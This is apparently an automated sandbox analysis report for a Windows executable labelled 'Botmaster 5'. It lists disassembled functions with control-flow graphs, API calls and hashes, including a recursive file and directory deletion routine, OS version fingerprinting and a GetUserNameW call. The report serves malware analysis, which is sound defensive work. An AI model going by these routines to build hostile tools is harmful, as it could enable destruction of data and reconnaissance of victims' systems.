29954 4241fb 29931->29954 29935 404892 29962 426b2b GetObjectType DeleteObject DestroyIcon memset HeapFree 29935->29962 29937 404897 29963 4276c5 FreeLibrary memset HeapFree 29937->29963 29939 40489c 29964 41c5a0 HeapDestroy 29939->29964 29941 4048a1 29942->29903 29943->29905 29944->29907 29945->29911 29946->29913 29947->29915 29948->29919 29949->29921 29950->29923 29951->29925 29952->29927 29953->29929 29955 424207 _strftime 29954->29955 29968 427f94 29955->29968 29958 40488d 29961 425df2 FreeLibrary 29958->29961 29959 424234 HeapFree 29959->29958 29960 424229 HeapFree 29960->29959 29961->29935 29962->29937 29963->29939 29964->29941 29965->29909 29966->29917 29967->29931 29969 424214 29968->29969 29970 427fa1 29968->29970 29969->29958 29969->29959 29969->29960 29970->29969 29971 424104 17 API calls 29970->29971 29971->29970 29972 4220dc SendMessageW 29973 4320fd 29983 431fc0 _vsnwprintf 29973->29983 29975 432119 GetPropW 29976 4321ae DefWindowProcW 29975->29976 29980 432131 _strftime 29975->29980 29977 4321c0 29976->29977 29978 432192 29978->29976 29979 432197 CallWindowProcW 29978->29979 29979->29977 29980->29978 29981 432170 HeapFree 29980->29981 29982 43217a HeapFree RemovePropW 29980->29982 29981->29982 29982->29978 29983->29975

                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                  Function 0041C1F3 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 215fileCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 2535 41c1f3-41c208 2536 41c4b6-41c4bc 2535->2536 2537 41c20e-41c211 2535->2537 2537->2536 2538 41c217-41c238 wcsncpy wcslen 2537->2538 2539 41c255-41c27b wcscpy 2538->2539 2540 41c23a-41c240 2538->2540 2542 41c281-41c285 2539->2542 2543 41c37a-41c37e 2539->2543 2540->2539 2541 41c242-41c254 wcscat 2540->2541 2541->2539 2542->2543 2545 41c28b-41c296 wcscmp 2542->2545 2544 41c380-41c3b9 wcscpy wcscat FindFirstFileW 2543->2544 2546 41c4b5 2544->2546 2547 41c3bf-41c3c5 2544->2547 2545->2543 2548 41c29c-41c2a0 2545->2548 2546->2536 2549 41c3ca-41c3fa wcscpy wcscat 2547->2549 2548->2544 2550 41c2a6-41c2de wcscpy wcscat FindFirstFileW 2548->2550 2551 41c448-41c44c 2549->2551 2552 41c3fc-41c400 2549->2552 2553 41c371-41c378 2550->2553 2554 41c2e4-41c314 wcscpy wcscat 2550->2554 2555 41c458-41c45f DeleteFileW 2551->2555 2556 41c44e-41c456 SetFileAttributesW 2551->2556 2557 41c402-41c406 2552->2557 2558 41c465-41c477 FindNextFileW 2552->2558 2553->2544 2559 41c354-41c364 FindNextFileW 2554->2559 2560 41c316-41c32b wcscmp 2554->2560 2555->2558 2556->2555 2557->2558 2563 41c408-41c41d wcscmp 2557->2563 2558->2549 2562 41c47d-41c48a FindClose 2558->2562 2559->2554 2561 41c36a-41c36b FindClose 2559->2561 2560->2559 2564 41c32d-41c342 wcscmp 2560->2564 2561->2553 2566 41c496-41c49a 2562->2566 2567 41c48c-41c494 SetFileAttributesW 2562->2567 2563->2558 2568 41c41f-41c434 wcscmp 2563->2568 2564->2559 2565 41c344-41c34f call 41c1f3 2564->2565 2565->2559 2570 41c4a5-41c4b2 RemoveDirectoryW 2566->2570 2571 41c49c-41c4a3 2566->2571 2567->2566 2568->2558 2572 41c436-41c446 call 41c1f3 2568->2572 2570->2546 2571->2546 2572->2558
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • wcsncpy.MSVCRT ref: 0041C224
                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0041C22E
                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0041C24E
                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041C264
                                                                                                                                                                                                                  • wcscmp.MSVCRT ref: 0041C28D
                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041C2B4
                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0041C2C1
                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041C2D7
                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041C2F2
                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0041C305
                                                                                                                                                                                                                  • wcscmp.MSVCRT ref: 0041C322
                                                                                                                                                                                                                  • wcscmp.MSVCRT ref: 0041C339
                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,?,?,?,?,?,?,?,00000000), ref: 0041C35C
                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0041C36B
                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041C38E
                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0041C39B
                                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,00000000), ref: 0041C3B1
                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041C3D8
                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0041C3EB
                                                                                                                                                                                                                  • wcscmp.MSVCRT ref: 0041C414
                                                                                                                                                                                                                  • wcscmp.MSVCRT ref: 0041C42B
                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000000), ref: 0041C456
                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000000), ref: 0041C45F
                                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(?,00000010,?,?,?,?,?,?,?,00000000), ref: 0041C46F
                                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0041C480
                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000000), ref: 0041C494
                                                                                                                                                                                                                  • RemoveDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000000), ref: 0041C4AC
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: File$Find$wcscatwcscmpwcscpy$AttributesCloseFirstNext$DeleteDirectoryRemovewcslenwcsncpy
                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                  • API String ID: 3664895508-438819550
                                                                                                                                                                                                                  • Opcode ID: 1acdf33090f00ff4de5d3493c09cf4b93db4c6f6561f58e2c34b82026772c4d3
                                                                                                                                                                                                                  • Instruction ID: 818d7ac94336760085aa416f2fe06b3395b7879d8cfd7b3c34f3fd25d48ca819
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1acdf33090f00ff4de5d3493c09cf4b93db4c6f6561f58e2c34b82026772c4d3
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D271ABB284421C6ADB24EF90CC89FEB77BCAF08314F0444ABE914D2141E7B99AC4CF59
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00421743 Relevance: 47.4, APIs: 16, Strings: 11, Instructions: 146libraryloadermemoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 2575 421743-421763 call 428039 call 423cbd 2580 4218a2-4218c0 2575->2580 2581 421769-421819 memset LoadLibraryW 2575->2581 2582 4218c2 2580->2582 2583 4218c7-4218f5 CreateWindowExW 2580->2583 2584 421822-421829 2581->2584 2585 42181b-421820 LoadLibraryW 2581->2585 2582->2583 2586 421984-42198a 2583->2586 2587 4218fb-42196e call 427e22 HeapAlloc SetPropW SendMessageW SetWindowLongW SetWindowPos RedrawWindow call 423d8e 2583->2587 2588 42182b-421893 GetProcAddress * 6 2584->2588 2589 421898 2584->2589 2585->2584 2593 421973-421982 call 42352c 2587->2593 2588->2589 2589->2580 2593->2586
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 00423CBD: LoadLibraryW.KERNEL32(COMCTL32.DLL,-FFFFFEC7), ref: 00423CDD
                                                                                                                                                                                                                    • Part of subcall function 00423CBD: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00423CF2
                                                                                                                                                                                                                    • Part of subcall function 00423CBD: memset.MSVCRT ref: 00423D03
                                                                                                                                                                                                                    • Part of subcall function 00423CBD: FreeLibrary.KERNEL32(?), ref: 00423D3E
                                                                                                                                                                                                                    • Part of subcall function 00423CBD: LoadLibraryW.KERNEL32(uxtheme.dll), ref: 00423D49
                                                                                                                                                                                                                    • Part of subcall function 00423CBD: GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00423D5A
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00421775
                                                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(RICHED20.DLL), ref: 00421810
                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(RICHED32.DLL), ref: 00421820
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(745C0000,OpenThemeData), ref: 00421837
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CloseThemeData), ref: 00421849
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(GetThemeBackgroundContentRect), ref: 0042185B
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(IsThemeBackgroundPartiallyTransparent), ref: 0042186D
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(DrawThemeParentBackground), ref: 0042187F
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(DrawThemeBackground), ref: 00421891
                                                                                                                                                                                                                  • CreateWindowExW.USER32(-000001FF,RichEdit20W,00000000,?,?,?,?,?,00000000,000000FF,00000000,-FFFFFEC7), ref: 004218EB
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00000010,?,?,00000000,0045DF26,00407668,00000014,00000019,0000006E,0000019A,00000096,00000800,00000013,00000019,00000046), ref: 0042191D
                                                                                                                                                                                                                  • SetPropW.USER32(00000000,PB_ClientRect,00000000), ref: 0042192A
                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000C5,000000FF,00000000), ref: 00421939
                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000FC,0042162D), ref: 00421947
                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037,?,00000000,0045DF26,00407668,00000014,00000019,0000006E,0000019A,00000096), ref: 0042195A
                                                                                                                                                                                                                  • RedrawWindow.USER32(00000000,00000000,00000000,00000541,?,00000000,0045DF26,00407668,00000014,00000019,0000006E,0000019A,00000096,00000800,00000013,00000019), ref: 00421968
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AddressProc$Library$LoadWindow$memset$AllocCreateFreeHeapLongMessagePropRedrawSend
                                                                                                                                                                                                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeParentBackground$GetThemeBackgroundContentRect$IsThemeBackgroundPartiallyTransparent$OpenThemeData$PB_ClientRect$RICHED20.DLL$RICHED32.DLL$RichEdit$RichEdit20W
                                                                                                                                                                                                                  • API String ID: 2786237234-441401328
                                                                                                                                                                                                                  • Opcode ID: aaafd5f065d742f69c7bd722c75fbd57ed158642b5483389ae1596973c7d4943
                                                                                                                                                                                                                  • Instruction ID: 3b68e2732a193d1c22bc4780641a39f1d6535b71556c03726686db5c2dc31df2
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaafd5f065d742f69c7bd722c75fbd57ed158642b5483389ae1596973c7d4943
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F518CB1600224BBCB10AFA5BC499563FA9FB55714B108227F111D72B0E7F94894CF9E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00408B02 Relevance: 38.7, APIs: 1, Strings: 21, Instructions: 198COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 3078 408b02-408b04 3079 408b09-408b14 3078->3079 3079->3079 3080 408b16-408b4a call 427766 3079->3080 3083 408e10-408e27 call 429950 3080->3083 3084 408b50-408b70 call 4279d1 3080->3084 3089 408e39-408e59 call 429a70 * 2 3083->3089 3090 408b82-408bac call 427698 GetSystemInfo call 4291b0 3084->3090 3091 408b72-408b7d call 427a32 3084->3091 3100 408bb1-408bef call 429950 call 4291b0 call 4299b0 call 429a30 3090->3100 3091->3090 3109 408bf1-408c02 call 40a008 3100->3109 3110 408c07-408c14 call 429a30 3100->3110 3115 408df2-408e0c call 429950 3109->3115 3116 408c16-408c27 call 40a008 3110->3116 3117 408c2c-408c39 call 429a30 3110->3117 3115->3089 3116->3115 3124 408c92-408c9f call 429a30 3117->3124 3125 408c3b-408c49 3117->3125 3134 408ca1-408caf 3124->3134 3135 408cda-408ce7 call 429a30 3124->3135 3127 408c63 3125->3127 3128 408c4b-408c5a 3125->3128 3130 408c65-408c67 3127->3130 3128->3127 3129 408c5c-408c61 3128->3129 3129->3130 3132 408c69-408c7a call 40a008 3130->3132 3133 408c7c-408c88 call 40a008 3130->3133 3144 408c8d 3132->3144 3133->3144 3139 408cb1-408cc2 call 40a008 3134->3139 3140 408cc4-408cd0 call 40a008 3134->3140 3147 408d22-408d2f call 429a30 3135->3147 3148 408ce9-408cf7 3135->3148 3146 408cd5 3139->3146 3140->3146 3144->3115 3146->3115 3156 408d31-408d3f 3147->3156 3157 408d6a-408d77 call 429a30 3147->3157 3150 408cf9-408d0a call 40a008 3148->3150 3151 408d0c-408d18 call 40a008 3148->3151 3159 408d1d 3150->3159 3151->3159 3160 408d41-408d52 call 40a008 3156->3160 3161 408d54-408d60 call 40a008 3156->3161 3168 408d79-408d87 3157->3168 3169 408daf-408dbc call 429a30 3157->3169 3159->3115 3167 408d65 3160->3167 3161->3167 3167->3115 3171 408d89-408d9a call 40a008 3168->3171 3172 408d9c-408da8 call 40a008 3168->3172 3169->3115 3177 408dbe-408dcc 3169->3177 3176 408dad 3171->3176 3172->3176 3176->3115 3179 408de1-408ded call 40a008 3177->3179 3180 408dce-408ddf call 40a008 3177->3180 3179->3115 3180->3115
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,00000000,?,RtlGetVersion), ref: 00408B96
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: InfoSystem
                                                                                                                                                                                                                  • String ID: 10.0$5.0$5.1$5.2$6.0$6.1$6.2$6.3$ERROR$RtlGetVersion$Windows 10$Windows 2000$Windows 7$Windows 8$Windows Server 2003$Windows Server 2008$Windows Server 2012$Windows Server 2016$Windows Vista$Windows XP$ntdll.dll
                                                                                                                                                                                                                  • API String ID: 31276548-2397706006
                                                                                                                                                                                                                  • Opcode ID: 4aff6b6556b4de260d85ac6947625d9daa585f8fae7eb6fc3588557a2e339c25
                                                                                                                                                                                                                  • Instruction ID: eda4fd2cbdd44f3a836df940b2a0b51db70a8612117e0df9e791307d9dcd197a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aff6b6556b4de260d85ac6947625d9daa585f8fae7eb6fc3588557a2e339c25
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE717D301083949BC724EB21D985AEF73A5BF94304F50893FE0C95A2E2DB3C5D59DA4E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041C085 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 101fileCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 3446 41c085-41c09a 3447 41c0a0-41c0a4 3446->3447 3448 41c1d7-41c1de 3446->3448 3447->3448 3449 41c0aa-41c0da wcsncpy wcslen 3447->3449 3450 41c0e1-41c0e9 3449->3450 3451 41c0dc-41c0df 3449->3451 3452 41c125-41c129 3450->3452 3453 41c0eb-41c0ee 3450->3453 3451->3450 3451->3452 3456 41c131-41c134 3452->3456 3454 41c0f0-41c102 wcscat 3453->3454 3455 41c103-41c113 GetDriveTypeW 3453->3455 3454->3455 3455->3448 3457 41c119-41c120 3455->3457 3458 41c136-41c14c FindFirstFileW 3456->3458 3459 41c12b-41c130 3456->3459 3457->3448 3460 41c180-41c187 3458->3460 3461 41c14e-41c155 3458->3461 3459->3456 3462 41c192-41c19a 3460->3462 3463 41c189-41c190 3460->3463 3464 41c160-41c175 3461->3464 3465 41c157-41c15e 3461->3465 3467 41c1d6 3462->3467 3468 41c19c-41c1a4 3462->3468 3463->3462 3466 41c1a6-41c1b5 GetFileAttributesW 3463->3466 3469 41c177-41c17e FindClose 3464->3469 3465->3469 3470 41c1b7-41c1b9 3466->3470 3471 41c1bd-41c1cd GetDriveTypeW 3466->3471 3467->3448 3468->3466 3468->3467 3469->3467 3470->3467 3472 41c1bb 3470->3472 3471->3467 3473 41c1cf 3471->3473 3472->3473 3473->3467
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • wcsncpy.MSVCRT ref: 0041C0B7
                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0041C0C8
                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0041C0FC
                                                                                                                                                                                                                  • GetDriveTypeW.KERNELBASE(?,?,?,?,00000000), ref: 0041C10A
                                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00000000), ref: 0041C144
                                                                                                                                                                                                                  • FindClose.KERNELBASE(00000000,?,?,?,?,00000000), ref: 0041C178
                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(0000002E,?,?,?,?,00000000), ref: 0041C1AD
                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(0000002E,?,?,?,?,00000000), ref: 0041C1C4
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: DriveFileFindType$AttributesCloseFirstwcscatwcslenwcsncpy
                                                                                                                                                                                                                  • String ID: .$.
                                                                                                                                                                                                                  • API String ID: 172296787-3769392785
                                                                                                                                                                                                                  • Opcode ID: 1c0eab87a6281fff8af39201b1ad1bb78e7babba320e7e213cf2cf64f6c82382
                                                                                                                                                                                                                  • Instruction ID: d0ec428b251e0538e3a77114e968f62b8f939fcf880cc71096329147fd9ef647
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c0eab87a6281fff8af39201b1ad1bb78e7babba320e7e213cf2cf64f6c82382
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07317271CC0218AACF34AB948DC8AEF77B9AB14314F504597D51592182E7B88EC4CF9A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040734D Relevance: 17.1, APIs: 5, Strings: 4, Instructions: 1346windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 3497 40734d-407386 call 4245d6 3500 4073b7-407729 call 4209ea call 420aad call 420c8d call 420aad call 424615 * 2 call 42466b call 420f8e call 428950 call 4299b0 call 426dd3 call 4201e2 call 420f8e call 41c8f0 call 420fab call 420355 call 410923 call 420fd6 call 420355 call 41c8f0 call 420fab call 41c8f0 call 420fab call 421030 * 2 call 424615 * 2 call 42466b call 420f8e call 426dd3 call 4201e2 call 420355 call 421743 call 42198d SendMessageW call 42198d SendMessageW call 42198d SendMessageW call 42198d SendMessageW call 429950 * 3 call 41c085 3497->3500 3501 407388-4073b2 call 426dd3 call 42466b call 4201e2 3497->3501 3589 407734 3500->3589 3590 40772b-40772e 3500->3590 3501->3500 3592 407739-40773b 3589->3592 3590->3589 3591 407730-407732 3590->3591 3591->3592 3593 407799 3592->3593 3594 40773d-40776c call 429950 * 3 call 41c085 3592->3594 3595 40779b-40779d 3593->3595 3617 407771-40777e 3594->3617 3597 4077f6-4083a0 call 421a54 * 2 call 420b20 call 42466b call 420f8e call 41c8f0 call 420fab call 426dd3 call 4201e2 call 420355 call 41c8f0 call 420fab call 410923 call 420fd6 call 420355 call 41c8f0 call 420fab call 410923 call 420fd6 call 421030 call 420c8d call 421030 call 424615 * 2 call 42466b call 420f8e call 426dd3 call 4201e2 call 428df0 call 4299b0 GetUserNameW call 420355 call 421d09 call 420355 call 421d09 call 420355 call 421d09 call 42466b call 420f8e call 41c8f0 call 420fab call 426dd3 call 4201e2 call 420355 call 41c8f0 call 420fab call 410923 call 420fd6 call 420355 call 41c8f0 call 420fab call 410923 call 420fd6 call 421030 call 420c8d call 421030 call 424615 * 2 call 42466b call 420f8e call 426dd3 call 4201e2 * 2 call 428950 call 4299b0 call 428950 call 4299b0 call 420355 * 2 call 421ed7 call 421d09 call 420aad call 429950 * 3 call 420355 call 429950 * 2 call 406502 call 420355 call 42466b call 420f8e call 41c8f0 call 420fab call 426dd3 call 4201e2 call 420355 call 41c8f0 call 420fab call 410923 call 420fd6 call 420355 call 41c8f0 call 420fab call 410923 call 420fd6 call 421030 call 420c8d call 421030 call 424615 * 2 call 42466b call 420f8e call 426dd3 call 4201e2 * 2 call 420355 * 2 call 421d09 call 420aad call 42466b call 420f8e call 41c8f0 call 420fab call 426dd3 call 4201e2 call 420355 call 41c8f0 call 420fab call 410923 call 420fd6 call 420355 call 41c8f0 call 420fab call 410923 call 420fd6 call 421030 call 420c8d call 421030 call 424615 * 2 call 42466b call 420f8e call 426dd3 call 4201e2 call 420f8e call 41c8f0 call 420fab call 428950 call 4299b0 call 420355 call 410923 call 420fd6 call 428950 call 4299b0 call 420355 3595->3597 3598 40779f-4077f0 call 429950 * 3 call 42198d call 4072c6 3595->3598 3911 4083a2-4083c6 call 4220a4 3597->3911 3912 4083c8-4083d1 3597->3912 3598->3597 3618 407780-407783 3617->3618 3619 407789 3617->3619 3618->3619 3622 407785-407787 3618->3622 3623 40778e-407790 3619->3623 3622->3623 3623->3593 3627 407792-407797 3623->3627 3627->3595 3915 408434-408664 call 420b20 call 41c8f0 * 2 call 41cb24 call 41c8f0 call 420fab call 41c8f0 call 420fab call 41c8f0 call 420fab call 421030 call 420c8d call 421030 call 424615 * 2 call 42466b call 420f8e call 426dd3 call 4201e2 call 428950 call 4299b0 call 428950 call 4299b0 call 429950 * 3 call 420355 call 4220a4 * 2 3911->3915 3914 4083d3-408429 call 429950 * 3 call 4220a4 3912->3914 3912->3915 3931 40842e 3914->3931 3983 408675-40867d 3915->3983 3984 408666-408670 call 420bae 3915->3984 3931->3915 3985 40868e-408696 3983->3985 3986 40867f-408689 call 420bae 3983->3986 3984->3983 3989 408698-4086a7 call 420bae 3985->3989 3990 4086a9-4086b3 call 420b20 3985->3990 3986->3985 3994 4086b8-4086c0 3989->3994 3990->3994 3995 4086c2-4086d1 call 420bae 3994->3995 3996 4086d3-4086dd call 420b20 3994->3996 4000 4086e2-408a7e call 42466b call 420f8e call 41c8f0 call 420fab call 426dd3 call 4201e2 call 420355 call 41c8f0 call 420fab call 410923 call 420fd6 call 420355 call 41c8f0 call 420fab call 410923 call 420fd6 call 421030 call 420c8d call 421030 call 424615 * 2 call 42466b call 420f8e call 426dd3 call 4201e2 call 420355 call 42466b call 422302 call 420355 call 42466b call 420f8e call 41c8f0 call 420fab call 426dd3 call 4201e2 call 428950 call 4299b0 call 420355 call 41c8f0 call 420fab call 410923 call 420fd6 call 420355 call 41c8f0 call 420fab call 410923 call 420fd6 call 421030 call 420c8d call 41c903 3995->4000 3996->4000 4101 408a80-408a86 4000->4101 4102 408a8a-408a8f 4000->4102 4101->4102 4103 408a88-408a91 4101->4103 4104 408a93-408a95 4102->4104 4103->4104 4106 408af1-408b01 call 429a70 4104->4106 4107 408a97-408aec call 4049e7 call 4245f9 * 2 4104->4107 4107->4106
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 0042466B: GetClientRect.USER32(00000000,?), ref: 00424689
                                                                                                                                                                                                                    • Part of subcall function 00424615: GetClientRect.USER32(00000000,?), ref: 00424637
                                                                                                                                                                                                                    • Part of subcall function 00424615: GetMenu.USER32(00000000), ref: 00424645
